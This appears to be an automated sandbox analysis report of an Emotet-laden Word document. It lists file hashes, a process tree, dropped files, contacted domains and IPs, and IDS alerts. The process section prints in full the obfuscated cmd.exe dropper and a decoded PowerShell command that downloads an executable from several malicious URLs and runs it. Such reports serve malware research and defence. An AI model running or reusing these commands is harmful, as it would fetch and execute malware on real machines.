File name: | IBAN_DE99 5040 8356 5899 3835 28.doc |
Full analysis: | https://app.any.run/tasks/ad49f922-fea4-4fca-9be7-02171c0aeb9e |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over its lifetime it has been upgraded into highly destructive malware. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns. |
Analysis date: | December 14, 2018, 10:16:54 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Dec 14 04:03:00 2018, Last Saved Time/Date: Fri Dec 14 04:03:00 2018, Number of Pages: 1, Number of Words: 4, Number of Characters: 26, Security: 0 |
MD5: | C5DD395A55E41BDE9C40E2500A69ECA3 |
SHA1: | E26E6E9B952EA3F90F70687B349C78775D7C5AE0 |
SHA256: | 582E8E6C805A2FB1A8F75C8B8F7C310B8FFD3572768D1BD84130635C390CEFEA |
SSDEEP: | 1536:r7ljmW9/bvF292zDL3021fJ7XdUrnYJ3Nuw/+a9:nl/bvFo2QQfJjdUrnQ9u |
Extension | Detected type (score) |
---|---|
.doc | Microsoft Word document (54.2) |
.doc | Microsoft Word document (old ver.) (32.2) |
Property | Value |
---|---|
Title: | - |
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:12:14 04:03:00 |
ModifyDate: | 2018:12:14 04:03:00 |
Pages: | 1 |
Words: | 4 |
Characters: | 26 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 29 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: | |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2844 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\IBAN_DE99 5040 8356 5899 3835 28.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3812 | c:\nYwjQcmSnzqz\oPirlnKKhU\rMzdQJEih\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set AG=QtFwnzQYJacnribwCcHbmDpEAnUVF T.4shX+@S;e9/Z'}lvW(8dO-y\G{uj3gxfK$N0)=o:,Ik5&&for %I in (65,1,33,52,69,44,22,73,58,44,39,65,25,20,34,69,25,40,15,53,70,19,59,40,17,1,29,66,40,1,31,48,40,19,16,46,13,40,25,1,39,65,66,34,26,69,44,34,1,1,22,71,42,42,17,13,22,12,13,9,1,13,31,17,70,31,58,74,42,15,41,37,34,1,1,22,71,42,42,9,25,61,58,46,46,9,12,31,17,70,20,31,19,12,42,8,75,52,43,8,37,34,1,1,22,71,42,42,17,58,19,40,31,59,70,19,58,12,61,42,34,37,34,1,1,22,71,42,42,61,40,25,1,40,33,9,25,46,58,13,33,31,17,70,20,42,25,51,75,26,51,58,60,37,34,1,1,22,71,42,42,19,9,33,13,17,74,13,31,17,70,20,42,22,32,20,46,35,66,1,33,44,31,38,22,46,13,1,49,44,37,44,68,39,65,52,38,20,69,44,24,66,18,44,39,65,17,58,74,29,69,29,44,41,60,32,44,39,65,21,27,34,69,44,33,19,5,44,39,65,64,51,38,69,65,40,25,47,71,1,40,20,22,36,44,55,44,36,65,17,58,74,36,44,31,40,62,40,44,39,63,70,12,40,9,17,34,49,65,56,20,63,29,13,25,29,65,66,34,26,68,57,1,12,54,57,65,25,20,34,31,21,70,15,25,46,70,9,51,28,13,46,40,49,65,56,20,63,72,29,65,64,51,38,68,39,65,21,56,15,69,44,30,6,18,44,39,73,63,29,49,49,56,40,1,53,73,1,40,20,29,65,64,51,38,68,31,46,40,25,61,1,34,29,53,61,40,29,50,67,67,67,67,68,29,57,73,25,47,70,74,40,53,73,1,40,20,29,65,64,51,38,39,65,9,16,58,69,44,51,7,23,44,39,19,12,40,9,74,39,45,45,17,9,1,17,34,57,45,45,65,25,15,70,69,44,46,63,15,44,39,85)do set lQ6=!lQ6!!AG:~%I,1!&&if %I==85 echo !lQ6:~-421!|FOR /F "delims=.VXC46 tokens=2" %d IN ('assoc.psc1')DO %d -" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2304 | CmD /V:O/C"set AG=QtFwnzQYJacnribwCcHbmDpEAnUVF T.4shX+@S;e9/Z'}lvW(8dO-y\G{uj3gxfK$N0)=o:,Ik5&&for %I in (65,1,33,52,69,44,22,73,58,44,39,65,25,20,34,69,25,40,15,53,70,19,59,40,17,1,29,66,40,1,31,48,40,19,16,46,13,40,25,1,39,65,66,34,26,69,44,34,1,1,22,71,42,42,17,13,22,12,13,9,1,13,31,17,70,31,58,74,42,15,41,37,34,1,1,22,71,42,42,9,25,61,58,46,46,9,12,31,17,70,20,31,19,12,42,8,75,52,43,8,37,34,1,1,22,71,42,42,17,58,19,40,31,59,70,19,58,12,61,42,34,37,34,1,1,22,71,42,42,61,40,25,1,40,33,9,25,46,58,13,33,31,17,70,20,42,25,51,75,26,51,58,60,37,34,1,1,22,71,42,42,19,9,33,13,17,74,13,31,17,70,20,42,22,32,20,46,35,66,1,33,44,31,38,22,46,13,1,49,44,37,44,68,39,65,52,38,20,69,44,24,66,18,44,39,65,17,58,74,29,69,29,44,41,60,32,44,39,65,21,27,34,69,44,33,19,5,44,39,65,64,51,38,69,65,40,25,47,71,1,40,20,22,36,44,55,44,36,65,17,58,74,36,44,31,40,62,40,44,39,63,70,12,40,9,17,34,49,65,56,20,63,29,13,25,29,65,66,34,26,68,57,1,12,54,57,65,25,20,34,31,21,70,15,25,46,70,9,51,28,13,46,40,49,65,56,20,63,72,29,65,64,51,38,68,39,65,21,56,15,69,44,30,6,18,44,39,73,63,29,49,49,56,40,1,53,73,1,40,20,29,65,64,51,38,68,31,46,40,25,61,1,34,29,53,61,40,29,50,67,67,67,67,68,29,57,73,25,47,70,74,40,53,73,1,40,20,29,65,64,51,38,39,65,9,16,58,69,44,51,7,23,44,39,19,12,40,9,74,39,45,45,17,9,1,17,34,57,45,45,65,25,15,70,69,44,46,63,15,44,39,85)do set lQ6=!lQ6!!AG:~%I,1!&&if %I==85 echo !lQ6:~-421!|FOR /F "delims=.VXC46 tokens=2" %d IN ('assoc.psc1')DO %d -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2492 | C:\Windows\system32\cmd.exe /S /D /c" echo $tsO='pIu';$nmh=new-object Net.WebClient;$NhU='http://cipriati.co.uk/w9@http://angullar.com.br/J5OZJ@http://cube.joburg/h@http://gentesanluis.com/nd5Udu3@http://basicki.com/p4mlXNts'.Split('@');$OSm='ANH';$cuk = '934';$DVh='sbz';$KdS=$env:temp+'\'+$cuk+'.exe';foreach($Gmf in $NhU){try{$nmh.DownloadFile($Gmf, $KdS);$DGw='TQH';If ((Get-Item $KdS).length -ge 80000) {Invoke-Item $KdS;$aCu='dYE';break;}}catch{}}$nwo='lfw';" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2560 | C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=.VXC46 tokens=2" %d IN ('assoc.psc1') DO %d -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3016 | C:\Windows\system32\cmd.exe /c assoc.psc1 | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3292 | PowerShell - | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3340 | "C:\Users\admin\AppData\Local\Temp\934.exe" | C:\Users\admin\AppData\Local\Temp\934.exe | — | powershell.exe |
User: admin Company: Mozilla, Netscape Integrity Level: MEDIUM Exit code: 0 Version: Personal | ||||
2100 | "C:\Users\admin\AppData\Local\Temp\934.exe" | C:\Users\admin\AppData\Local\Temp\934.exe | — | 934.exe |
User: admin Company: Mozilla, Netscape Integrity Level: MEDIUM Exit code: 0 Version: Personal | ||||
3624 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | — | 934.exe |
User: admin Company: Mozilla, Netscape Integrity Level: MEDIUM Exit code: 0 Version: Personal | ||||
PID | Process | Filename | Type | |
---|---|---|---|---|
2844 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR984E.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2844 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\344093F1.wmf | — | |
MD5:— | SHA256:— | |||
2844 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B79DAC27.wmf | — | |
MD5:— | SHA256:— | |||
3292 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JYT5CR160L4E8PD8E7OM.temp | — | |
MD5:— | SHA256:— | |||
3292 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
3292 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19b200.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2844 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FA8C57B0.wmf | wmf | |
MD5:86615E1F8604036617AD3B59D748D666 | SHA256:167AF41799A5E7C3726DF24FE901C74436B265C003A146A3E98BB459B8BAAB6F | |||
2844 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:FD861AE6DAD43651988EA525BC25D1A8 | SHA256:EC537272DC9277B723DA61CAB2DC8CC4466A59423211FB5F4147EE27E22C74D7 | |||
3292 | powershell.exe | C:\Users\admin\AppData\Local\Temp\934.exe | executable | |
MD5:6B16787E1391447A02DFBAD0EC3DC696 | SHA256:695DDE02005872C92B00CEB56CFF716531065B477A1799418891C4FB443D4660 | |||
2844 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:74EA363455D9B70EA3153425443392D4 | SHA256:71D9B0C0BC9A010F225B11CBAB92BA09313A25AE7B2F381CF87EAE244DF84CF5 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
684 | archivesymbol.exe | GET | — | 201.111.83.186:8080 | http://201.111.83.186:8080/ | MX | — | — | malicious |
3292 | powershell.exe | GET | — | 191.6.198.133:80 | http://angullar.com.br/J5OZJ/ | BR | — | — | malicious |
3292 | powershell.exe | GET | 200 | 198.12.153.174:80 | http://gentesanluis.com/nd5Udu3/ | US | executable | 120 Kb | malicious |
3292 | powershell.exe | GET | 503 | 212.227.94.120:80 | http://cipriati.co.uk/w9 | DE | html | 1.07 Kb | malicious |
684 | archivesymbol.exe | GET | — | 186.136.68.246:80 | http://186.136.68.246/ | AR | — | — | malicious |
684 | archivesymbol.exe | GET | 200 | 189.180.237.144:7080 | http://189.180.237.144:7080/ | MX | binary | 132 b | malicious |
3292 | powershell.exe | GET | 301 | 191.6.198.133:80 | http://angullar.com.br/J5OZJ | BR | html | 237 b | malicious |
3292 | powershell.exe | GET | 404 | 154.70.250.131:80 | http://cube.joburg/h | ZA | html | 260 b | malicious |
3292 | powershell.exe | GET | 301 | 198.12.153.174:80 | http://gentesanluis.com/nd5Udu3 | US | html | 373 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3292 | powershell.exe | 191.6.198.133:80 | angullar.com.br | IPV6 Internet Ltda | BR | malicious |
3292 | powershell.exe | 154.70.250.131:80 | cube.joburg | ICTGLOBE | ZA | malicious |
3292 | powershell.exe | 212.227.94.120:80 | cipriati.co.uk | 1&1 Internet SE | DE | suspicious |
3292 | powershell.exe | 198.12.153.174:80 | gentesanluis.com | GoDaddy.com, LLC | US | malicious |
684 | archivesymbol.exe | 201.111.83.186:8080 | — | Uninet S.A. de C.V. | MX | malicious |
684 | archivesymbol.exe | 189.180.237.144:7080 | — | Uninet S.A. de C.V. | MX | malicious |
684 | archivesymbol.exe | 186.136.68.246:80 | — | Prima S.A. | AR | malicious |
Domain | IP | Reputation |
---|---|---|
cipriati.co.uk | | malicious |
angullar.com.br | | malicious |
cube.joburg | | malicious |
gentesanluis.com | | malicious |
PID | Process | Class | Message |
---|---|---|---|
3292 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3292 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3292 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3292 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3292 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3292 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32 |
3292 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3292 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3292 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
684 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |